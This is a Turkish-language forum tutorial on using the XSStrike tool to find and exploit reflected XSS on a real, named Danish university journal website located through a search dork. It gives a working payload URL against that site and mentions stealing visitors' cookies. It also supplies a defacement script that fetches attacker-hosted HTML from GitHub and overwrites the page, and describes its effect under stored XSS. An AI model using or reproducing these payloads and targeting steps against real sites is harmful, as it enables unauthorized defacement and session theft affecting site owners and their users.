Herkese selam dostlar bugün bu konumuzda XSStrike toolunu anlatacağım. Şimdiden okuduğunuz için teşekkürler.
İlk önce Toolumuzun kurulumuna geçelim
kali linuxümü açtım. ve /opt klasöründe terminale bu kodu girdim.
kod:
Kod:
git clone https://github.com/s0md3v/XSStrike.git;cd XSStrike;python3 xsstrike.py
Kod:
# bunu yazdıktan sonra python3 xsstrike.py yazabilirsiniz.
evet şimdi toolumuzu hazırladığımıza göre xss dork yazalım.
benim kullanacağım dork:
Kod:
inurl:php?search= site:dk
Acta Chemica Scandinavica sitesi hedefimiz olsun.
dorkun bu sitede bulduğu link:
sitede search yapacağımız inputlar var (genelde searchler reflected xss olur) hemen xss deneyelim
klasik xss payloadı:
JavaScript:
<script>alert(1)</script>
sonuç:
(xss açığı var)
şimdi sitede search yaptıktan sonra bize verdiği linkteki yazdığımız payloadı sildikten sonra linki xsstrike'a yönlendirelim. Bu link işinde dikkatli olun doğru linki verdiğinizden emin olun
burayı:
şimdi sıra XSStrike'ta
Kod:
python3 -u "http://actachemscand.ki.ku.dk/results.php?keywords="
ve taramayı başlatalım.
şimdi bir payloadı seçelim
bunu linkteki keywords= parametresinin yanına yazalım.
yani buraya:
Kod:
http://actachemscand.ki.ku.dk/results.php?keywords=<details%0aontoggLE%09=%09a=prompt,a()%0dx//
evet arkadaşlar bu payload siteye ayrıntılar diye bi kutucuk ekliyor bu kutucuğu açınca alert geliyor.
xsstriketa başka parametreler de var --fuzzer, --crawl gibi isterseniz bunlarıda kullanabilirsiniz.
xss açıklı siteye birçok şey yapabilirsiniz özellikle büyük bir siteyse xss sayesinde birçok kişinin cookiesini çalabilirsiniz.
isterseniz biz xss ile index deneyelim. Ama sitedeki xss zafiyeti reflected türü olduğu için sadece linki kullanan kişilerde görünecektir indexiniz.
neyse
siteye bu payloadı yazıyorsunuz
JavaScript:
<script>fetch("https://raw.githubusercontent.com/profiliniz/repositoryniz/main/dosyanız").then(response => response.text()).then(html => document.body.innerHTML = html);</script>
ama bundan önce githubda bir repository oluşturun ve bunun içine bir dosya oluşturup içine indexinizin kodlarını yazın ardından raw linkini alın ve https://raw.githubusercontent.com'a raw linkinizi yapıştırın
ardından enterleyin
ve index yüklendi
eğer stored xss te bunu yaparsanız indexiniz sitede ana sayfa gibi yerlerde görünür. yada zafiyetin bulunduğu sayfada görünür yani linkte görünmez.
konumu okuduğunuz için teşekkür ederim
Son düzenleme: